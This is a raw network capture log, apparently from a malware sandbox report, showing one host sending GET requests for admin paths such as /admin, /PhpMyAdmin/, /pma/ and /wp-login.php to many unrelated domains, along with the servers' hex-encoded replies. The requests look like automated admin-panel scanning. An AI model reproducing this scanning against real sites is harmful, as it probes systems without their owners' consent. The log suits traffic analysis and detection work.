Nov 30, 2023 11:22:43.065589905 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-181.ec2.internal X-Request-Id: 415b3117-498e-4065-8502-9bef07de228c Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.4	65001	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.110323906 CET	214	OUT	GET /admin HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.274926901 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_qiRPZIAtzHydvUMsAVIGvSPb6sAI+wzN7l9S/uTmIHkupXeDqZUu4CsMnmm4bNbD/AIwPeLw5n+IFZQnwfrE6Q== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 31 36 61 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b e9 76 db b8 92 fe 1d 3f 05 a3 9c 6b c9 d3 da e5 dd a6 33 72 e4 b5 23 79 53 16 39 a7 27 87 22 21 89 36 45 aa 49 ca 5a 72 f3 00 f3 5c f7 c5 ee 57 00 48 82 92 9c 74 fa 76 e7 9c 39 a3 ee 58 22 50 40 15 6a 43 55 01 3c 7c d9 b8 7a d3 ee 5c 9f 68 83 70 e8 1c ad 1d d2 97 66 19 a1 51 30 ac ae e3 99 8f 8f 6c a6 67 9a a7 93 49 e3 a6 73 f9 ab 77 7f 31 78 32 5b f5 9b 93 e3 e3 9b 7a e3 6e 52 9f dc d5 2f 8f eb 6f 7f 1f 37 4e 4f da 1f 6f dd f2 b9 5f de ea bd bb de 39 b9 6c ef ec 4c 3b ee f5 f0 b6 3b 6a ce 36 9f 1e 77 7f ed d8 e7 ee 63 6b c4 2c f7 e1 aa de ba 34 8d 8f 8d 8f e6 af 37 97 ad b2 fb f1 d7 fb cb b7 3b 6d d3 be 6c ec d6 bd f3 8f bf 56 b6 76 df d4 27 27 f5 fa 8d ae 7f fe dd be bd be bf a8 87 f3 f3 99 f5 f4 ae 19 d4 df 5f 9c 3d dd 5d 77 b7 83 fa c5 2f 93 79 6b c7 d9 bb 2b 8d db c3 8b f3 c7 f1 e8 23 6b fc 7e ff 6e bc f9 26 68 ba c3 e1 66 b7 d5 6d 94 ea 17 93 6b f6 76 b2 e5 fe 72 71 7a 7f e3 4e 7a fe c9 36 26 ce 68 d3 a1 e3 06 7a 66 10 86 a3 fd 52 69 32 99 14 27 b5 a2 e7 f7 4b 95 bd bd bd d2 94 f8 c1 81 f6 1d c3 ed eb 19 e6 66 b4 f8 17 f1 8b 19 d6 d1 9a 86 cf e1 90 85 06 d8 18 8e 0a ec f7 b1 fd a4 67 de 78 6e c8 dc b0 d0 9e 8d 58 46 33 c5 93 9e 09 d9 34 2c d1 bc 07 9a 39 30 fc 80 85 fa 38 ec 15 76 33 25 75 22 d7 18 32 3d f3 64 b3 c9 c8 f3 43 65 f8 c4 b6 c2 81 6e b1 27 db 64 05 fe 90 d7 6c d7 0e 6d c3 29 04 a6 e1 30 bd 92 d7 82 81 6f bb 8f 85 d0 2b f4 ec 50 77 bd 78 ee d0 0e 1d 76 64 0e 8b e6 fc b0 24 1e 04 f5 81 e9 db a3 50 0b 7c 53 cf 08 Data Ascii: 16a8[v?k3r#yS9'"!6EIZr\WHtv9X"P@jCU<\|z\hpfQ0lgIsw1x2[znR/o7NOo_9lL;;j6wck,47;mlVv''_=]w/yk+#k~n&hfmkvrqzNz6&hzfRi2'KfgxnXF34,908v3%u"2=dCen'dlm)0o+Pwxvd$P\|S
Nov 30, 2023 11:22:43.274965048 CET	1340	IN	Data Raw: 3e f4 3d af ef b0 a2 e9 0d 4b 86 15 30 37 60 25 cb 1b 1a b6 1b 94 4c a3 57 7c 08 5e 1b dd 91 5e c9 1c 1d 96 c4 e0 23 ce 86 20 9c 39 4c 1b 32 cb 36 f4 0c 3a 18 58 76 b4 56 34 02 2c f4 73 10 1a 7e 59 fb b2 f6 a2 6b 98 8f 7d df 1b bb d6 be 36 f6 9d Data Ascii: >=K07`%LW\|^^# 9L26:XvV4,s~Yk}6\TjwNi:.7z>VtYXl&(y}\3Be_FS<xGF1ek_T"+H~b&185BOO6fxO_
Nov 30, 2023 11:22:43.275001049 CET	1340	IN	Data Raw: 30 cf 31 33 1a 12 be 3e 32 dc cc e7 2e d2 e6 47 28 d5 8b 17 2f 1a 57 cd 7f fd 6f ab ae e1 ff eb db ab c6 c9 e5 da 8b c3 92 81 6c ba 04 3d 94 49 f0 b2 46 56 a5 46 12 7d 2b 14 b6 a6 74 2f 82 88 40 2b a3 d1 ea 05 8d 44 a2 32 e0 70 50 89 92 62 fc e2 Data Ascii: 013>2.G(/Wol=IFVF}+t/@+D2pPbS9m$)0BkM3Vpsc\ioXQRhp~Y`<?yf4}#MGd"-y-+#3jVhZFB1r$G
Nov 30, 2023 11:22:43.275036097 CET	1340	IN	Data Raw: 56 dd ef 8f 69 97 08 92 19 62 5c 57 23 da 13 a9 e7 0b 77 30 d9 d1 b8 7b 61 91 d3 b1 46 a8 f6 a1 82 49 c7 11 38 bc 28 57 a4 ab c2 26 1f c0 9d 04 d7 a0 f4 d8 08 d8 3b df 21 f0 d5 fc cf 96 5e 87 81 1e 8d 24 b7 7a ca 8b a2 34 82 a7 4c 51 97 07 3a 86 Data Ascii: Vib\W#w0{aFI8(W&;!^$z4LQ:MrIen?k,<Vh[/$8#$Fo^7DFVvNX=EJ8H\5,N)6{5:HPocxC#x&
Nov 30, 2023 11:22:43.275069952 CET	1340	IN	Data Raw: 3d 62 2d 74 2b 83 57 f8 a6 88 3e a2 a8 45 cb 79 dd 07 5c ab c6 df 6a a4 a7 4a a8 43 9d 14 5b 65 f0 03 24 64 92 fc 88 f7 a0 3e 88 a3 1e 2e 67 ba ae 41 55 07 0d d7 ea 29 25 e7 13 c6 1a 40 d0 9f d0 f3 1b 50 53 0f ff 2d 47 fa 2c 1c fb 7c 40 05 57 14 Data Ascii: =b-t+W>Ey\jJC[e$d>.gAU)%@PS-G,\|@WZ[x>.Sc1S@`KOr26uPKz:#iC}Qxz~f>8xlBELMu=/C*.1h:RQ\33hA$P'h
Nov 30, 2023 11:22:43.275118113 CET	216	IN	Data Raw: 94 01 9c 20 47 d6 9b 16 71 0e 43 92 a0 11 77 b3 37 bb cc 34 cb 5d a3 b2 bb d9 2b 6f 77 6b b8 32 be db db da ae ed f4 8c dd cd ee 8e d9 dd d9 db 33 b6 f6 2a 58 5e a2 c6 29 f7 9b a5 17 1c 4a c9 2d 69 71 a5 92 58 40 6f c3 f3 db d2 d9 e4 b6 74 f6 68 Data Ascii: GqCw74]+owk23X^)J-iqX@oth9xqW;JYt%sSh$S:7~2nZ3zFe!A
Nov 30, 2023 11:22:43.275161982 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.4	65242	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.224720001 CET	224	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.357944012 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/PhpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.4	49308	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.476363897 CET	212	OUT	GET /pma/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.575391054 CET	919	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/pma/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NzyAvIz2aJ3ZOiFUGvFuSOVcSG5H+k+YOkZTXiljith8BusfqH30vm0raQQfJvCbiho4ataIMrZR7t0qRj6YLA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:43.782488108 CET	919	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/pma/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NzyAvIz2aJ3ZOiFUGvFuSOVcSG5H+k+YOkZTXiljith8BusfqH30vm0raQQfJvCbiho4ataIMrZR7t0qRj6YLA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.4	49309	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.505801916 CET	224	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.632996082 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/PhpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.4	65005	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.534933090 CET	223	OUT	GET /admin HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.4	65003	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.534949064 CET	217	OUT	GET /admin HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.4	64996	157.7.44.171	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.534959078 CET	222	OUT	GET /admin.php HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.794958115 CET	430	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 207 Connection: keep-alive Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin.php was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.4	65002	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:43.535171986 CET	225	OUT	GET /wp-login.php HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.712810040 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:43.718297005 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.899070024 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:43 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:43 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=3mi2sek3qutmbn6avhslhp5im0; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:43.899080992 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:43.899091005 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:43.899106026 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di
Nov 30, 2023 11:22:44.783813953 CET	300	OUT	GET /wp-admin/ HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=3mi2sek3qutmbn6avhslhp5im0 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://www.hul.co.uk/
Nov 30, 2023 11:22:44.960990906 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:44 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:45.086863041 CET	291	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=3mi2sek3qutmbn6avhslhp5im0 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://www.hul.co.uk/
Nov 30, 2023 11:22:45.267349005 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:45 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 